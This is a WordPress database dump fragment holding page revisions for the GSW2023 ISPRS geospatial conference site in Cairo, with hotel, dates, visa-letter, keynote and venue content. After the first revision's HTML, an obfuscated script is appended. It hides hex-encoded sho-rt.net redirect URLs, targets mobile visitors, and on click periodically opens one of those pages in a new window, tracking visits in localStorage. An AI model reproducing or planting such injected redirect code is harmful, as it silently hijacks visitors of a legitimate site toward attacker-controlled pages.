src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-04 12:57:22','2023-09-04 12:57:22','',3066,'https://gsw2023.com/?p=5454',0,'revision','',0),
(5455,1,'2023-09-04 12:58:55','2023-09-04 12:58:55','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://www.esri.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Workshop Paper Award</h4></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 